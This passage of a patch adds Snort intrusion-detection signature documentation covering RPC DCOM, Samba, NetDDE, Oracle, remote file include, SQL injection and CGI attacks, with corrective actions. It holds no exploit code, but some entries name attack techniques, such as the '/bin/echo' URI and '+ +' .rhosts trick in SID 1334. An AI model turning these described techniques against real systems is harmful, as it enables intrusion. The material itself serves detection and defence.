+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ISPConfig
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3217.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3217
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3021.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3021
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1547.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1547
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000128.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+100000128
+
+-- 
+Summary: 
+This event is generated when an attempt is made to link to an external script 
+as part of the Stadtaus.com PHP Form Mail program.
+
+-- 
+
+Impact: 
+The script being included will be run in the same security context as the 
+vulnerable program, enabling a variety of web-based attacks.
+
+--
+Detailed Information:
+The Stadtaus.com PHP Form Mail system's download_center_lite.inc.php module, 
+when including other scripts by way of its script_root parameter, fails to 
+validate the location of these scripts, and thus allows attackers to include 
+any malicious script anywhere on the web. The included script will be executed 
+with the same permissions and in the same security context at the vulnerable 
+program itself, thus allowing a range of attacks.
+
+--
+Affected Systems:
+Stadtaus.com PHP Form Mail Script 2.3
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, there are no vendor-supplied patches or workarounds. However, if it 
+is possible to globally disable PHP's 'allow_url_fopen' and 'register_globals' 
+directives in your environment, doing so may disable this vulnerability. 
+However, turning off these directives should be tested in a non-production 
+environment, in case doing so breaks other scripts on your system.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1775.txt
@@ -0,0 +1,58 @@
+Rule:  
+
+--
+Sid: 1775
+
+-- 
+
+Summary: 
+This event is generated when the user "root" logs in to a MySQL database from an external source.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when someone using the name "root" logs in to a MySQL database.
+
+The 'root' user may have access to all databases on the system, with full privileges to add users, delete data, add information, etc.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. The user logs in with the username 'root', full access is then granted to that user for all databases served by the MySQL daemon. The attacker may then continue to gain sensitive information from any database in the system.
+
+-- 
+
+Ease of Attack: 
+Simple. This may be post-attack behavior and can be indicative of the successful exploitation of a vulnerable system.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in as the root user from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000582.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000582
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_view_hierarchy.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"cat_view_hierarchy.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2935.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2935
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2914.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2914
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure set_local_flavor
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2169.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2169
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000583.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000583
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_view_registered_only.php" using a remote file being 
+passed as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"cat_view_registered_only.php" script used by the "Indexu" application running 
+on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1710.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1710
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000628.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000628
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "message_subscriber.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"message_subscriber.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1559.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1559
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000789.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000789
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "FreeWebshop" application running on a webserver. Access to the file "details.php" with SQL commands being passed as the "prod" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "prod" parameter in the "details.php" script used by the "FreeWebshop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using FreeWebshop
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1027.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1027
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/586.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+586
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) selection_svc is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port selection_svc is using.  Attackers can also learn what versions of the selection_svc protocol are accepted by selection_svc.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as selection_svc run.  The selection_svc RPC service is used by SunView, an old windowing system from Sun.  A vulnerability exists in selection_svc that allows a remote user to read files that are readable by SunView. 
+
+--
+Affected Systems:
+Sun SunOS 3.5
+Sun SunOS 4.0
+Sun SunOS 4.0.1
+Sun SunOS 4.0.2
+Sun SunOS 4.0.3
+Sun SunOS 4.1
+Sun SunOS 4.1.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where selection_svc runs.  This may be a precursor to accessing selection_svc.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access selection_svc, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for selection_svc, not probes of the selection_svc service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the selection_svc service itself. An attacker may attempt to go directly to the selection_svc port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/8
+
+CERT
+http://www.cert.org/advisories/CA-1990-05.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS25
+
+
+--
--- /dev/null
+++ b/doc/signatures/1334.txt
@@ -0,0 +1,80 @@
+Rule:
+
+--
+Sid:
+1334
+
+--
+Summary:
+Attempted echo command access via web
+
+--
+Impact:
+Attempt to gain system environment information or an attempt to post
+information on the host using the echo command.
+
+--
+Detailed Information:
+This rule generates an event when a UNIX "echo" command is used over a
+plain-text (unencrypted) connection on one of the specified web ports to
+the target web server. The "echo" command may be used to modify the
+content of arbitrary files by means of shell output redirection.
+
+The rule looks for the "echo" command in the client to web server
+network traffic and does not indicate whether the command was actually
+successful. The presence of the "echo" command web traffic indicates
+that an attacker attempted to trick the web server into executing system
+commands in non-interactive mode i.e. without a valid shell session. 
+
+Alternatively this rule may generate an event in an unencrypted HTTP
+tunneling connection to the server or a shell connection via another
+exploit against the web server.
+
+This may also be an attempt to gain intelligence about the environment
+variables on a webserver. echo is a built-in shell command that will
+return information about the system's environment variables. This
+information is valuable to an attacker who can use it to plan further
+attacks based on the information returned.
+
+--
+Attack Scenarios:
+1. The attacker can make a standard HTTP request that contains
+'/bin/echo' in the URI which can then return sensitive information on
+system environment variables present on the host.  This command may also
+be requested on a command line should the attacker gain access to the machine.
+
+2. An attacker uses a "echo" command via a web server connection to add
+"+ +" to a corresponding ".rhosts" file which controls access
+permissions to the system via r-commands
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+man echo
+
+--
--- /dev/null
+++ b/doc/signatures/1859.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1859
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2965.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2965
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2443.txt
@@ -0,0 +1,82 @@
+Rule:  
+
+--
+Sid:
+2443
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in multiple versions of Internet Security Systems software.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible leading to unauthorized 
+access to the affected host. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the way that multiple ISS products parse ICQ
+messages. This can lead to execution of arbitrary code on hosts using
